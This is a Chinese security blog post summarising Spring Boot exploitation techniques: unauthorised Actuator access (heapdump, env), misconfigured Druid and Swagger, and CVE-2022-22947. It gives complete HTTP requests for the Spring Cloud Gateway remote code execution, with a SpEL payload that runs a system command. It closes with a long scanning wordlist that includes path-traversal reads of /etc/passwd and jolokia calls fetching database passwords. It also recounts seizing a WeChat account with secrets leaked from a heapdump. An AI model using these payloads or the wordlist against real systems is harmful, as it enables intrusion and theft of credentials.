【备忘录】常用Springboot漏洞利用姿势总结

发布日期：2024-10-14 11:37    点击次数：189

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

图片

欢迎关注本公众号，长期推送技术文章

前言

随着互联网的不断发展，现在的Web开发发展越来越快，更多的企业选择使用框架快速搭建自己的系统。在众多的框架中，Spring Boot因为简单和高效的优点，受到了众多开发者的青睐。

先来介绍一下Spring Boot，Spring Boot是由Pivotal团队提供的一套开源框架，可以简化spring应用的创建及部署。它提供了丰富的Spring模块化支持，可以帮助开发者更轻松快捷地构建出企业级应用。Spring Boot通过自动配置功能，降低了复杂性，同时支持基于JVM的多种开源框架，可以缩短开发时间，使开发更加简单和高效。

使用搜索引擎查看，也可以看见SpringBoot是如此的火热。

图片

常见漏洞合集Spring Boot Actuator未授权访问漏洞利用

对于这个actuator相信大部分师傅都不陌生，Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时，它会自动将多个端点注册到路由进程中。当这些端点存在配置不当的时候，就有可能导致一些系统信息泄露、 RCE 等安全问题。

Spring Boot 1.x版本端点在根URL下注册

Spring Boot 2.x版本端点移动到/actuator/路径

参考官网文档，其中常用的端点功能描述如下：

Actuator 禁用了大部分端点。因此，默认情况下只有 /health 和 /info 这两个端点可用。

/auditevents 列出了与安全审计相关的事件，如用户登录/注销。此外，还可以根据 Principal 或类型等字段进行过滤。

/beans 返回 BeanFactory 中所有可用的 Bean。与 /auditevents 不同，它不支持过滤。

/conditions（之前称为 /autoconfig）会生成有关自动配置条件的报告。

/configprops 允许获取所有 @ConfigurationProperties Bean。

/env 返回当前环境属性（Environment Properties），也可以检索单个属性。

/flyway 提供了有关 Flyway 数据库迁移的详细信息。

/health 汇总了应用的健康状况。

/heapdump 会构建并返回应用所用 JVM 的 Heap Dump。

/info 返回一般信息。它可能是自定义数据、构建信息或最新提交的详细信息。

/liquibase 的行为类似于 /flyway，但针对的是 Liquibase。

/logfile 返回普通应用日志。

/loggers 能够查询和修改应用的日志级别。

/metrics 详细介绍了应用的指标。这可能包括通用指标和自定义指标。

/prometheus 返回的指标与前一个类似，但格式化后可与 Prometheus 服务器一起使用。

/scheduledtasks 提供了应用中每个计划（定时）任务的详细信息。

/sessions 列出了 HTTP Session，前提是正在使用 Spring Session。

/shutdown 可以优雅地关闭应用。

/threaddump 会 dump 底层 JVM 的线程信息。

其中当heapdump、env、threaddump等端点存在未授权访问时，咱们可以从中获取到服务器存在的敏感信息，包括OSS秘钥、数据库连接密码、redis连接密码、配置环境等，导致系统信息泄露甚至丢失权限。

案例

这是某次测试过程中发现存在的heapdump泄露，从中发现数据库密码、redis密码以及公众号appid和appsecret，并实现公众号接管。

图片

图片

图片

Druid配置不当

严格来说这个应该不算SpringBoot的漏洞，只是在配置过程中没有做好权限控制，或者存在弱口令导致。

当druid未配置鉴权时，咱们可以直接获取druid配置信息。

访问 url/xxxx/druid/basic.json

图片

当存在弱口令时，咱们也是可以进入后台，查看可能存在的session等，获取相应系统权限。

图片

Spring Cloud Gateway RCE漏洞

参考自博客：

CVE-2022-22947：Spring Cloud Gateway RCE漏洞分析以及复现_cve-2022-22947漏洞复现-CSDN博客https://blog.csdn.net/qq_50808416/article/details/130677837

由于Spring Cloud Gateway也是一种微服务的应用，所以也可以让Actuator对它进行监控，本漏洞就是通过Actuator操作gateway接口列表来实现远程执行命令

当我们查看存在gateway接口时，可以通过构造恶意路由，从而实现rec。

创建路由

 POST /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.2.131:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 331 { 'id': 'test', 'filters': [ { 'name': 'AddResponseHeader', 'args': { 'value': '#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\'whoami\'}).getInputStream()))}', 'name': 'result' } } ], 'uri': 'http://example.com:80', 'order': 0 }

刷新路由

 POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.2.131:8080 Connection: close Content-Type: application/x-www-form-urlencoded

访问创建的新路由获取执行的结果

显示执行了whoami的命令

GET /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.2.131:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

图片

Swagger未授权访问

swagger就是一个在你写接口的时候自动帮你生成接口文档的东西，只要你遵循它的规范并写一些接口的说明注解即可。

当配置不当时会存在接口文档泄露，如果存在权限管理不当，会造成越权漏洞，信息泄露等。

图片

常见目录总结

以下是SpringBoot常用的一下路径，在扫描SpringBoot时可以达到事半功倍的效果

//#/wallboard/ /swagger-ui.html/Swagger/ui/index/acl/article?id=66/acm/actuator/actuator/#/wallboard/actuator/acm/actuator/admin/swagger-ui.html/actuator/api-docs/actuator/api.html/actuator/api/index.html/actuator/api/swagger-ui.html/actuator/api/v2/api-docs/actuator/api/v2/swagger.json/actuator/archaius/actuator/article?id=${7*7}/actuator/article?id=66/actuator/auditLog/actuator/auditevents/actuator/auditevents/actuator/intergrationgraph/actuator/autoconfig/actuator/beans/actuator/beans/actuator/jolokia/actuator/beans1/actuator/caches/actuator/caches/actuator/refresh/actuator/caches/cache/actuator/channels/actuator/conditions/actuator/conditions/actuator/jolokia/list/actuator/conditions1/actuator/configprops/actuator/configurationMetadata/actuator/distv2/index.html/actuator/docs/actuator/druid/login.html/actuator/dubbo-provider/distv2/index.html/actuator/dump/actuator/env/actuator/env/actuator/liquibase/actuator/env/java.home/actuator/env/spring.jmx.enabled/actuator/env/system/actuator/events/actuator/exportRegisteredServices/actuator/features/actuator/features/actuator/peripheral/swagger-ui.html/actuator/flyway/actuator/gateway/gateway/actuator/h2-console/actuator/health/actuator/health//actuator/health/actuator/loggers/actuator/healthcheck/actuator/heapdump/actuator/httptrace/actuator/httptrace/actuator/mappings/actuator/hystrix.stream/actuator/hystrix.stream/*/actuator/swagger/actuator/info/actuator/info/actuator/metrics/actuator/integrationgraph/actuator/intergrationgraph/actuator/jolokia/actuator/jolokia/*/actuator/static/swagger.json/actuator/jolokia/list/actuator/liquibase/actuator/logfile/actuator/logfile/actuator/sw/swagger-ui.html/actuator/loggers/actuator/loggers//actuator/loggingConfig/actuator/management/heapdump/actuator/mappings/actuator/mappings            /actuator/mappings/actuator/monitor/conditions/actuator/metrics/actuator/metrics            /actuator/metrics//actuator/metrics/actuator/monitor/env/actuator/monitor/auditevents/actuator/monitor/conditions/actuator/monitor/env/actuator/monitor/loggers/actuator/monitor/mappings/actuator/monitor/scheduledtasks/actuator/monitor/threaddump/actuator/peripheral/swagger-ui.html/actuator/peripheral/v2/api-docs/actuator/prometheus/actuator/prometheus/actuator/swagger-dubbo/api-docs/actuator/refresh/actuator/refresh/actuator/peripheral/v2/api-docs/actuator/registeredServices/actuator/releaseAttributes/actuator/resolveAttributes/actuator/restart/actuator/scheduledtasks/actuator/scheduledtasks/actuator/monitor/mappings/actuator/sentinel/actuator/service-registry/actuator/prometheus/actuator/sessions/actuator/sessions//actuator/sessions/actuator/swagger-ui.html/actuator/shutdown/actuator/spring-security-oauth-resource/swagger-ui.html/actuator/spring-security-rest/api/swagger-ui.html/actuator/springWebflow/actuator/sso/actuator/ssoSessions/actuator/static/swagger.json/actuator/statistics/actuator/status/actuator/sw/swagger-ui.html/actuator/swagger/actuator/swagger-dubbo/api-docs/actuator/swagger-resourcesce/actuator/swagger-ui/actuator/swagger-ui.html/actuator/swagger-ui/index.html/actuator/swagger/codes/actuator/swagger/index.html/actuator/swagger/static/index.html/actuator/system//actuator/system/env/actuator/system/mappings/actuator/system/showOsInfo/actuator/system/showProperties/actuator/template/swagger-ui.html/actuator/threaddump/actuator/threaddump/actuator/monitor/scheduledtasks/actuator/tra/actuator/trace/actuator/user/swagger-ui.html/admin/swagger-ui.html/api/api-docs/api-docs/swagger.json/api.html/api/api-docs/api/apidocs/api/doc/api/index.html/api/swagger/api/swagger-resources/api/swagger-ui/api/swagger-ui.html/api/swagger-ui.json/api/swagger.json/api/swagger//api/swagger/ui/api/swaggerui/api/v1//api/v1/api-docs/api/v1/apidocs/api/v1/login/api/v1/swagger/api/v1/swagger-resources/api/v1/swagger-ui/api/v1/swagger-ui.html/api/v1/swagger-ui.json/api/v1/swagger.json/api/v1/swagger//api/v2/api/v2/api-docs/api/v2/apidocs/api/v2/login/api/v2/swagger/api/v2/swagger-resources/api/v2/swagger-ui/api/v2/swagger-ui.html/api/v2/swagger-ui.json/api/v2/swagger.json/api/v2/swagger//api/v3/apidocs/apidocs/swagger.json/article?id=${7*7}/article?id=66/auditevents/autoconfig/beans/beans1/caches/channels/clients/clients/actuator/system/showOsInfo/clients/all/actuator/tra/clients/saveOrUpdate/actuator/trace/cloudfoundryapplication/conditions/conditions1/configprops/distv2/index.html/doc.html/docs/docs//druid/*/actuator/swagger/codes/druid/api.html/druid/basic.json/druid/datasource.html/druid/index.html/druid/login.html/druid/spring.html/druid/sql.html/druid/wall.html/druid/webapp.html/druid/websession.html/druid/weburi.html/dubbo-provider/distv2/index.html/dump/entity/all/env/env//env/(name)/env/java.home/env/spring/env/spring.jmx.enabled/env/{name}/error/actuator/monitor/threaddump/eureka/eureka/*/actuator/service-registry/features/flyway/gateway/actuator/gateway/actuator/auditevents/gateway/actuator/beans/gateway/actuator/conditions/gateway/actuator/configprops/gateway/actuator/env/gateway/actuator/health/gateway/actuator/heapdump/gateway/actuator/httptrace/gateway/actuator/hystrix.stream/gateway/actuator/info/gateway/actuator/jolokia/gateway/actuator/logfile/gateway/actuator/loggers/gateway/actuator/mappings/gateway/actuator/metrics/gateway/actuator/scheduledtasks/gateway/actuator/swagger-ui.html/gateway/actuator/threaddump/gateway/actuator/trace/get/graphql/h2-console/health/health//heapdump/heapdump.json/httptrace/hystrix/hystrix.stream/info/intergrationgraph/jolokia/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.password/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager/getProperty/spring.datasource.url/jolokia/list/lastn/actuator/sessions/libs/swaggerui/liquibase/list/log/view?filename=/etc/passwd&base=../../../../../../../../../..//log/view?filename=/windows/win.ini&base=../../../../../../../../../..//logfile/loggers/login/admin/swagger-ui.html/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../..//manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../..//management/heapdump/mappings/metrics/metrics//metrics/mem/metrics/{name}/monitor/monitor/auditevents/monitor/beans/monitor/conditions/monitor/configprops/monitor/env/monitor/health/monitor/heapdump/monitor/httptrace/monitor/hystrix.stream/monitor/info/monitor/jolokia/monitor/loggers/monitor/mappings/monitor/metrics/monitor/scheduledtasks/monitor/threaddump/oauth/authorize/actuator/swagger/index.html/oauth/check_token/actuator/swagger/static/index.html/oauth/client/token/api-docs/oauth/confirm_access/actuator/system//oauth/error/actuator/system/env/oauth/get/token/api.html/oauth/refresh/token/api/doc/oauth/remove/token/api/index.html/oauth/token/actuator/system/mappings/oauth/token/list/api/swagger/oauth/user/token/api/swagger-resources/oauth/userinfo/api/swagger-ui.html/peripheral/swagger-ui.html/peripheral/v2/api-docs/prometheus/redis/keysSize/api/swagger/ui/redis/memoryInfo/api/swaggerui/refresh/restart/scheduledtasks/services/services/1/services/api/v2/api-docs/services/findAlls/api/v1/api-docs/services/findOnes/api/v1/login/services/granted/api/v1/swagger-resources/services/saveOrUpdate/api/v1/swagger-ui.html/sessions/shutdown/spring-security-oauth-resource/swagger-ui.html/spring-security-rest/api/swagger-ui.html/static/swagger.json/sw/swagger-ui.html/swagger/swagger-dubbo/api-docs/swagger-resources/swagger-resources/actuator/shutdown/swagger-resources/configuration/security/swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html/swagger-resources/configuration/ui/swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html/swagger-ui/swagger-ui.html/swagger-ui.html#/swagger-ui.html/api/v2/swagger.json/swagger-ui.json/swagger-ui/html/swagger-ui/index.html/swagger-ui/swagger.json/swagger.json/swagger.yml/swagger//swagger/codes/swagger/index.html/swagger/static/index.html/swagger/swagger-ui.html/swagger/ui/swagger/v1/swagger.json/swagger/v2/swagger.json/system//system/druid/index.html/system/druid/login.html/system/druid/websession.html/system/env/system/mappings/system/showOsInfo/system/showProperties/template/swagger-ui.html/threaddump/trace/trace//uc/env/user/swagger-ui.html/v1.1/swagger-ui.html/v1.2/swagger-ui.html/v1.3/swagger-ui.html/v1.4/swagger-ui.html/v1.5/swagger-ui.html/v1.6/swagger-ui.html/v1.7/swagger-ui.html/v1.8/swagger-ui.html/v1.9/swagger-ui.html/v1/agent/self/actuator/system/showProperties/v1/api-docs/v1/catalog/service/app/v1/catalog/services/actuator/threaddump/v1/swagger.json/v2.0/swagger-ui.html/v2.1/swagger-ui.html/v2.2/swagger-ui.html/v2.3/swagger-ui.html/v2/api-docs/v2/api-docs?group=swagger接口文档/v2/swagger.json/v3/api-docs/validata/code/version/webpage/system/druid/index.html/webpage/system/druid/login.html/webpage/system/druid/websession.html/actuator/gateway/routes/actuator/get/gateway/routes/new_route/actuator/gateway/routes/new_route/new_route/actuator/gateway/refresh/gateway/refresh/actuator/gateway/globalfilters/actuator/gateway/routefilters/actuator/gatewayroutes/1/actuator/nacos/actuator/nacos-config/actuator/swagger-resourcesce/actuator/nacos-discovery/actuator/swagger-ui/actuator/nacosconfig/actuator/nacos/v1/cs/configs/actuator/nacos/v1/cs/configs?dataId=Misplaced/actuator/nacos/v1/ns/instance/actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery/actuator/nacos/v2/cs/configs/actuator/nacos/v2/cs/configs?dataId=Misplaced/actuator/nacos/v2/ns/instance/actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery/actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/nacos/v1/cs/configs/nacos/v1/cs/configs?dataId=Misplaced/nacos/v1/ns/instance/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v2/cs/configs/nacos/v2/cs/configs?dataId=Misplaced/nacos/v2/ns/instance/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v1/cs/configs/v1/cs/configs?dataId=Misplaced/v1/ns/instance/v1/ns/instance?serviceName=springboot2-nacos-discovery/v2/cs/configs/v2/cs/configs?dataId=Misplaced/v2/ns/instance/v2/ns/instance?serviceName=springboot2-nacos-discovery/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/v3/cs/configs/nacos/v3/cs/configs?dataId=Misplaced/nacos/v3/ns/instance/nacos/v3/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v3/cs/configs/v3/cs/configs?dataId=Misplaced/v3/ns/instance/v3/ns/instance?serviceName=springboot2-nacos-discovery/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8/actuator/archaius/actuator/nacosdiscovery/actuator/configprops/actuator/nacos/actuator/health/nacos/actuator/heapdump/actuator/loggers/nacos/actuator/loggers/actuator/metrics/nacos/env/nacos/get?serviceName=springboot2-nacos-discovery/metrics/nacos/webjars/**/actuator/nacosconfig/actuator/nacos/config

图片

图片

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。